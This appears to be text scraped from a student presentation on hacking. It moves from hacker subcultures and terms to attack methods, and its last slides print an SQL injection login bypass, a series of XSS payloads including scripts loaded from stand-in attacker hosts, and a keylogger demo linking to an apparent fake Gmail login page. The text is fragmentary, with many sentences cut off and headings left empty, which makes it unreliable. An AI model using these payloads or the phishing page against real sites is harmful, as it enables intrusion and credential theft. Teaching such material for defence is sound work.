Академический Документы
Профессиональный Документы
Культура Документы
Submitted To:
Submitted By:
Other uses of the word hacker exist that are not related to computer security (computer
programmer and home computer hobbyists), but these are rarely used by the mainstream
media. Some would argue that the people that are now
considered hackers are not hackers, as before the media described the person who breaks
into computers as a hacker
there was a hacker community. This community was a community of people who had a large
interest in computer programming, often sharing, without restrictions, the source code for
the software they wrote.
The subculture that has evolved around hackers is often referred to as the computer
underground. Proponents
claim to be motivated by artistic and political ends, and are often unconcerned about the
use of illegal means to achieve them.
History
Hacking developed alongside "Phone Phreaking", a term
referred to exploration of the phone network without
authorization, and there has often been overlap between both
technology and participants. Bruce Sterling traces part of the
roots of the computer underground to the Yippee, a 1960s
Hacker attitudes
Several subgroups of the computer underground with different
attitudes and aims use different terms to demarcate
themselves from each other, or try to exclude some specific
group with which they do not agree. Eric S. Raymond
advocates that members of the computer underground should
be called crackers. Yet, those people see themselves as
hackers and even try to include the views of Raymond in what
they see as one wider hacker culture, a view harshly rejected
by Raymond himself. Instead of a hacker/cracker dichotomy,
they give more emphasis to a spectrum of different categories,
such as white hat (ethical hacking), grey hat, black
hat and script kiddie. In contrast to Raymond, they usually
reserve the term cracker to refer to black hat hackers, or more
generally hackers with unlawful intentions.
Types of hacking:-
White hat
Grey hat
Black hat
Script kiddie
Hacktivist
Hacktivism (a portman
teau of hack and activism) is "the nonviolent use of illegal or
Common methods
Security exploit
Password cracking
Packet sniffer
Spoofing attack
Root kit
Cross site scripting (xss)
Trojan horse
Virus
Worm
Key loggers
Phishing
Sql injection
Security exploit
A security exploit is a prepared application that takes
advantage of a known weakness. Common examples of
security exploits are SQL injection, Cross Site
Scripting and Cross Site Request Forgery which abuse security
Password cracking
Password cracking is the process of
recovering passwords from data that has been stored in or
transmitted by a computer system. A common approach is to
repeatedly try guesses for the password.
Packet sniffer
A packet sniffer is an application that captures data packets,
which can be used to capture passwords and other data in
transit over the network.
Spoofing attack
A spoofing attack involves one program, system, or website
successfully masquerading as another by falsifying data and
thereby being treated as a trusted system by a user or another
program. The purpose of this is usually to fool programs,
systems, or users into revealing confidential information, such
as user names and passwords, to the attacker.
Rootkit
Social engineering
Social Engineering is the art of getting persons to reveal
sensitive information about a system. This is usually done by
impersonating someone or by convincing people to believe you
have permissions to obtain such information.
Trojan horse
A Trojan horse is a program which seems to be doing one
thing, but is actually doing another. A trojan horse can be used
to set up a door in a computer system such that the intruder
can gain access later. (The name refers to the horse from
the Trojan War, with conceptually similar function of deceiving
defenders into bringing an intruder inside.
Virus
A virus is a self-replicating program that spreads by inserting
copies of itself into other executable code or documents.
Therefore, a computer virus behaves in a way similar to
a biological virus, which spreads by inserting itself into living
cells.
Worm
Like a virus, a worm is also a self-replicating program. A worm
differs from a virus in that it propagates through computer
networks without user intervention. Unlike a virus, it does not
need to attach itself to an existing program. Many people
conflate the terms "virus" and "worm", using them both to
describe any self-propagating program.
Phishing
Phishing is a way of attempting to acquire sensitive
information such as usernames,passwords and credit card
details by masquerading as a trustworthy entity in
anelectronic communication. Communications purporting to be
from popular social web sites, auction sites, online payment
Sql injection
SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered
for string literal escape characters embedded in SQL statements or
user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can
occur whenever one programming or scripting language is
embedded inside another. SQL injection attacks are also known as
SQL insertion attacks.
Guessing
Dictionary Attack
This type of attack uses some password cracking tools (we will
discuss these later). The tool will be equipped with
a dictionary which contains some commonly used passwords,
name of places, common names, and other commonly used
words. The password cracking tool then encrypt these words
Hybrid Attack
Memorization
Password grinding
INTRODUCTION TO KEYLOGGERS
Keystroke logging (often called key logging) is the action of
tracking (or logging) the keys struck on a keyboard, typically
in a covert manner so that the person using the keyboard is
unaware that their actions are being monitored. There are
numerous key logging methods, ranging from hardware and
software-based approaches to electromagnetic and acoustic
analysis.
TYPES OF KEYLOGGERS
Software-based key loggers
A hardware-based keylogger.
Electromagnetic emissions
It is possible to capture the electromagnetic emissions of a
wired keyboard from up to 20 metres (66 ft) away, without
being physically wired to it.[7] In 2009, Swiss researches
tested 11 different USB, PS/2 and laptop keyboards in a semi-
Anechoic chamber and found them all vulnerable, primarily
PHISHING
What is Phishing ?
Other contents:
Why is it possible to pass SQL Queries to the database even
though this is hidden behind a firewall?
Is my database at risk to SQL Injection?
SELECT count(*)
FROM users_list_table
WHERE username=’FIELD_USERNAME’
AND password=’FIELD_PASSWORD”
<form method="post"
action="http://testasp.vulnweb.com/login.asp">
<input name="tfUName" type="text" id="tfUName">
<input name="tfUPass" type="password" id="tfUPass">
</form>
SELECT id
FROM logins
WHERE username = '$username'
AND password = '$password’
SELECT id
FROM logins
WHERE username = 'Joe'
AND password = 'anything' OR 'x'='x'
This will allow the attacker to bypass the login form without
actually knowing a valid username / password combination!
"A web page contains both text and HTML markup that is
generated by the server and interpreted by the client browser.
Web sites that generate only static pages are able to have full
control over how the browser interprets these pages. Web
sites that generate dynamic pages do not have complete
control over how their outputs are interpreted by the client.
The heart of the issue is that if mistrusted content can be
introduced into a dynamic page, neither the web site nor the
client has enough information to recognize that this has
happened and take protective actions." (CERT Coordination
Center).
By now you should be aware that any sort of data that can land
on your web page from an external source has the potential of
being infected with a malicious script, but in what form does
the data come?
<SCRIPT>
The <SCRIPT> tag is the most popular way and sometimes
easiest to detect. It can arrive to your page in the following
forms:
External script:
<SCRIPT SRC=http://hacker-site.com/xss.js></SCRIPT>
Embedded script:
<BODY ONLOAD=alert("XSS")>
The BACKGROUND attribute can be similarly exploited:
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG>
Some browsers will execute a script when found in the <IMG>
tag as shown here:
<IMG SRC="javascript:alert('XSS');">
There are some variations of this that work in some browsers:
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<IFRAME>
<IFRAME SRC=”http://hacker-site.com/xss.html”>
<INPUT>
If the TYPE attribute of the <INPUT> tag is set to “IMAGE”, it
can be manipulated to embed a script:
<TABLE BACKGROUND="javascript:alert('XSS')">
The same applies to the <TD> tag, used to separate cells
inside a table:
<TD BACKGROUND="javascript:alert('XSS')">
<DIV>
The <DIV> tag, similar to the <TABLE> and <TD> tags can also
specify a background and therefore embed a script:
<OBJECT TYPE="text/x-scriptlet"
DATA="http://hacker.com/xss.html">
<EMBED>
If the hacker places a malicious script inside a flash file, it can
be injected in the following way:
<EMBED SRC="http://hacker.com/xss.swf"
AllowScriptAccess="always">
Is your site vulnerable to Cross Site Scripting?
http://test.searchengine.com/search.php?q=XSS%20
Vulnerability
http://test.searchengine.com/search.php?q=%3Cscript%3
Ealert%28%91This%20is%20an%20XSS%20Vulnerability%92%2
9%3C%2Fscript%3E
Upon loading the results page, the test search engine would
probably display no results for the search but it will display a
JavaScript alert which was injected into the page by using the
XSS vulnerability.
Hacked :
Keylogger Demo
Following keylogger is used Emissary
Keylogger
Link : http://freethemes00.t35.com/gmail%20login/
ATTACK DOES: